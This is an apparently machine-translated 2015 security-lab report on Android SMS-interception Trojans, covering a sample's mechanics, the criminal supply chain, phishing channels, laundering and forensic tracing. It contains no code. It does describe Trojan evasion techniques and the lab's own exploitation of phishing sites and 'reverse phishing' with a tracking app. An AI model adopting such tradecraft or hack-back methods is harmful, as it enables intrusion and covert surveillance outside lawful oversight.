Academy of Cheetah Sciences. 2015/09/10 14:04

0 x00 introduction


According to the cloud monitoring data of Cheetah security Laboratory, the number of varieties of “SMS interception” samples intercepted in the past month exceeded 100,000, affecting millions of users. “SMS interception” Trojan as a kind of common samples of Android mobile phone viruses, in the past two years shows a growing trend, the black industry chain behind it is also growing, “SMS interception horse” has become increasingly widespread mobile payment, online banking property and other aspects of the focus of security issues.

“SMS interception horse” leads to the online banking funds stolen news frequently reported, as a security manufacturer we are deeply distressed by the experience of the victim users, which also promotes us to investigate and kill the fight against “SMS interception horse” in the work to invest more efforts. We are in the process of security against “text message interception horse” black production operation have some understanding, on the black gang to track production forensics has also made some attempt to put in our process of below do a share some experience and thinking, hope can let users to be able to learn more about and around such security risks, I also hope that more attention will be paid to this issue within the security community.

0x01 Typical Sample Analysis


The typical SMS interception horse is not complicated in terms of technical principle and implementation. It monitors the process of sending and receiving SMS messages through BroadcastReceiver (BroadcastReceiver) or observation mode (ContenetObserver), but there are also some more comprehensive and powerful remote control trojans. SMS blocking is just one feature. Online similar SMS interception source code is also very much, understand the Development of Android can quickly write a “SMS interception horse”, this is also “SMS interception horse” variant speed, spread of an important reason.

One type of “SMS horse” variant was very active in our recent cloud monitoring, accounting for about 15% of the total sample size. This sample uses “Stalker” as the encryption key of the configuration information, so we named it “Stalker”. Let’s take it as an example to conduct a simple technical analysis of a typical “SMS interception horse”.

From the figure above, we can see the typical functional structure of a “SMS interceptor horse”. Some interesting details are also found in our analysis of the “Stalker” sample, as follows:

  1. For compatibility, the Trojan uses both “broadcast mechanism” and “observer mode” to intercept SMS messages. Check the authorization time from the Trojan startup can also see that this variant is developed by the Trojan author after the external sale.

  2. The Trojan horse filters and replaces sensitive keywords when sending back some SMS messages to the control phone to prevent monitoring and interception by mobile phone security software.

0x02 Black industry chain structure


As shown in the figure below, the “interception horse” black industrial chain is relatively clear from the overall division of labor. Trojan horse author, distribution and dissemination, discharging, washing interception material, money transfer and money laundering constitute the key links of the black industrial chain, among which the material owner holding a large number of “interception material” is in a relatively core position in the whole chain.

On the other hand, from the actual operation the whole circle and has a certain degree of complexity, in addition to the above several important roles, each link of industrial chain there will be some other black production personnel involved, such as stolen personal information, the black card business, fishing background maintenance, Trojan free to kill processing, etc., and even some overseas money laundering organization form; Inside the black production circle is also full of fraud, “black material” such things have become normal, with a certain technical strength of the gang is the windfall income; In addition, some gangs with strong technology and resources may occupy many or even all links of the whole chain, and their windfall profits are naturally the highest.

0x03 Transmission Channel


With the development of “SMS interception” black industry chain, the characteristics of low technical threshold and high return have attracted a large number of various black industry practitioners to join in succession, and the communication channels of interception horse have become increasingly rich, and various phishing tricks emerge in an endless stream. From the pseudo base station, SMS modem and other hardware devices mass send, porn phishing website induction and miscellaneous third-party APP distribution channels are involved.

We intercept from the recent “text message interception horse” of the 2000 active samples, part of the file name and the transmission using the keyword extraction fishing message content, the results shown in the figure below, from which we can see that using “photo album”, “documents” and other words of fishing technique occupies more than half, This kind of keyword is generally used in the address book group such a means of viral transmission, the interception is relatively high; The second is fake base station phishing, common types such as 10086 points exchange, bank upgrade, etc. There are also some phishing attacks against specific groups of people, such as vehicle violations, campus passes, transcripts, etc., which are often caused by the information leakage of owners or parents; Finally, some are spread by using social hot spots, such as the “Uniqlo” incident which was very popular some time ago.

As shown in the figure below, the change of communication channels also shows an important trend, from the early violent communication mode of “universal casting nets” to targeted and precision phishing attacks. In particular, in recent years, the leakage of personal information data has become increasingly active, and it has become a big accomplice to intercept the directed transmission of the horse. Black gangs buy personal data with high target value, such as commercial loans, credit cards, online shopping users, and then carefully construct phishing messages according to the relevant situation. Because the SMS contains the user’s name, ID number or bank card number and other personal data, and the situation of the SMS is in line with the recent business, the users who receive phishing messages often relax their security vigilance and are caught; For example, some “backpackers” carry fake base station equipment and send phishing messages in groups. They are mainly in large shopping malls, high-end office buildings and other areas, where the flow of people is large enough. More importantly, the people in such areas have higher “economic added value”.

0x04 Material washing channel


On the one hand, the funds in users’ bank cards can be transferred smoothly by black production gangs. On the other hand, it is due to the leakage of users’ online banking information and the control of their mobile phones by Trojan horses. On the other hand, the important reason lies in the lack of effective security supervision of various chaotic payment channels in China, and there are more or less some loopholes in risk control. Take the case of “material washing channel” we followed up last year as an example. The payment channel of a third-party platform in Beijing was used by black industry gangs, and thousands of users were victimized in just a few months, with losses ranging from dozens to tens of thousands.

There are many ways for gangs to “wash interceptors”, and there are also differences in transfer limits for different “washing channels”. The gangs usually transfer the funds in the user cards through various quick payment channels such as banks, merchants or third-party payment. According to the consumption records tracked by some victims, the funds flow is also varied, including the purchase of game coins, lottery tickets, phone recharge, air tickets and a variety of washing methods. Some credit card CVV code leakage users also found money through overseas consumption channels. Some infected phones may also be subscribed to malicious billing services or used to pay for game cards and sell them.

More and more authentication binding, security verification has been transferred to the user’s mobile phone, as the personal information center of the smartphone to play more than basic communications. On the one hand, it does bring a lot of convenience, but on the other hand, in the specific scenario of mobile phone poisoning, the user’s security line often becomes fragile. While maintaining the convenience of mobile payment, we need some more secure and reliable authentication methods, such as fingerprint authentication. Security confrontations may never stop, but we believe we can do better in the future.

0x05 Tracing Evidence Collection Case


In the security confrontation with “SMS interception horse” in the past two years, we have actually come into contact with a lot of victims. The stolen funds are at least hundreds of thousands, at most hundreds of thousands, and the multi-party shirking of responsibility and the difficulty of filing evidence and tracing may be the final result of the majority of victims. Apart from other factors of external parties, there are indeed some difficulties in obtaining evidence of such network crimes. Take “SMS interception horse” as an example:

  1. The relationship between the links of black production is staggered and complex, and a “interceptor” may often be sold and changed hands many times before being washed;
  2. The backstage server used for phishing website construction or receiving control mostly uses foreign hosts;
  3. Mobile phone cards used for command control are basically anonymous cards, so it is relatively difficult to track down and locate them.
  4. The stolen money is often cleaned after more shunts, and basically uses black card transfer, which brings difficulties to fund flow tracking.

As a security company, of course, in the security against also have our own advantages, for such SMS fraud, fishing sites and “horse” SMS blocking the characteristics of variant spread faster, we optimize the safety appraisal mechanism, strengthens the cloud can be done faster response to intercept, so to avoid further spread its harm to the user; On the other hand, by summarizing and analyzing the intercepted data of these scattered online silver phishing attacks and mobile Trojan horse transmission, we can sort out the highly active black production groups in various regions of the country, and then carry out more targeted monitoring and tracking forensics.

[A], pseudo base station SMS phishing case

Pseudo base station SMS phishing is a very important communication channel for “SMS interception horse”. Starting from the aspect of pseudo base station phishing website interception, cloud data shows that since the second half of 2014, pseudo base station SMS phishing has entered an unusually active period, with an average of nearly a thousand new phishing websites added every day at the peak. The security threat and impact range of “SMS intercepting ma” are far beyond other types of mobile phone viruses. When black gangs have access to users’ bank card information and verified mobile phones at the same time, users’ online banking assets can be said to be completely reduced to “fish on the chopping block”.

We were fishing on the active sites are classified and safety testing, collected from other sources for pseudo base station fishing website source was analyzed, and found the unauthorized including SQL injection, XSS storage type, the background and other kind of security holes, because most of these common fishing pseudo base station sites based on several categories of fixed template development and writing, Therefore, these security vulnerabilities are relatively common. These vulnerabilities are relatively simple, this year in the cloud and other security platforms have also been disclosed, there is no need to repeat the technical details.

Highly active pseudo base station phishing sites will be automatically added to our forensics system, through the batch automatic use of the above vulnerabilities we can carry out long-term monitoring of active black production groups across the country. Based on the data analysis of victim distribution and login IP of phishing background, we have a deeper understanding of the scale and operation of phishing black industry of fake base station in China.

  1. There are many victimized users in China. More than 400,000 pieces of online banking data were found from the background records of hundreds of phishing websites, including: name, ID number, bank of account, bank card number, withdrawal password, CVV code, etc. Through tracking and comparison, these active fishing background average new data more than 300 a day, some even up to thousands.
  2. The distribution of black production groups and victimized users is characterized by regional aggregation. Black production gangs concentrated in Guangdong, Fujian, Hainan, Guangxi and other regions, accounting for more than 80%; More victims are distributed in Guangdong, Hunan, Hubei and Henan, accounting for more than 60%.

Since the second half of 2014, we have strengthened the monitoring of the transmission channels of “fake base station phishing”, screened and sorted out more than 20 highly active gangs, and fed back some of the criminal evidence and tracking information to the police in many places across the country, cooperating in cracking down on these gangs. At present, some of the gangs involved in the case have been arrested, and the amount involved is at least one million level. We hope that more victims can recover their stolen funds after the case is closed.

[two], “SMS interception horse” forensics case

At the beginning of this paper, it was also mentioned that the intercepting volume of the sample variant of “SMS intercepting horse” increased rapidly in the past two years. A large number of samples of “SMS intercepting horses” use email to receive messages, and use mobile phone SMS for remote control. These characteristics can be used as a common starting point for tracing evidence. Of course, some samples use some Web programs for message management. In our actual testing process, we also found many kinds of security vulnerabilities, which can be used to assist in realizing automatic security forensics. On the other hand, according to the characteristics and communication scenes of “SMS interception horse”, we also tried the “reverse fishing” of “reverse fishing”. Later, we will talk about how to use the “reverse fishing” method to track down black production gangs.

Our security monitoring system will unpack and analyze the samples of “SMS interception” stored in the database, and automatically extract the email account password and control mobile phone number used by the hacking gangs from the decomcompiled code according to the auxiliary features. We will also strengthen the follow-up monitoring and tracking of the varieties with a large amount of interception.

On the other hand, based on the special transmission scenario of “SMS interception horse”, we can pretend to be the victim and use the email account password or background interface of the sample to deliver a carefully constructed “reverse phishing” bait to the gang to induce them to open the phishing link and obtain the IP address of the other party. They even went further by inducing them to install our phishing app and then use GPS positioning, front-facing camera photography and other features to get more forensic information.

“Reverse phishing” forensics ideas is not complex, the focus is on “bait” SMS to just cause the interest of the target, but also can not be too sudden cause the target alert, it is best to fuse with part of the normal SMS information, so that “true in false, false in true”; On the other hand, most of the target’s attention is on how to find more valuable target information from users’ messages, so they tend to ignore the authenticity of “bait”. This psychological characteristic is also an important factor for the success of “reverse fishing” method.

0x06 More thinking


This paper analyzes and summarizes the black industry chain behind “SMS interception horse” from many aspects such as typical samples, black production chain, tracking evidence collection, etc. It can be seen that the formation and operation of this black production is a complex and interlaced product. Our understanding of it may still be relatively partial, and there are far more hidden secrets than this article can reveal. This “SMS interception horse” security confrontation in addition to security vendors to kill interception, but also involves mobile network security, mobile phone system security, bank capital risk control, crime and other links, how to better protect the user network property security, we need to act more than now, think farther.

  1. As a security manufacturer, in addition to improving the identification mechanism of “SMS interception horse” samples, phishing websites and other threats, improving response speed and detection, killing and interception rate, we should change from passive defense to active attack, relying on our own advantages in data analysis and security technology, to pull security resistance to a higher level. On the other hand, for other victims discovered by forensic monitoring, security warnings can be issued in advance in appropriate ways to avoid further losses of users.
  2. Many users cheated because fishing SMS sender show for 10086 and 95588 normal number and relax a security alert to cause the effects, and provide safe and reliable network environment should be carriers of the basic responsibilities and obligations, operators need to strengthen the monitoring of pseudo base station, help more users to upgrade to a higher level of security of 4 g networks, Reduce exposure to pseudo base station interference;
  3. Major banks and payment platforms need to strengthen the supervision of their own payment and transfer channels, improve the risk control mechanism of users’ funds transfer and other sensitive operations, and prevent criminals from stealing users’ online banking assets.
  4. For mobile phone manufacturers, security protection is also a key link in the development and design of mobile ROM. Manufacturers can strengthen the access control of sensitive permissions from the bottom of the system, especially the contact, SMS records and other information related to user privacy, so as to achieve better protection and prompt.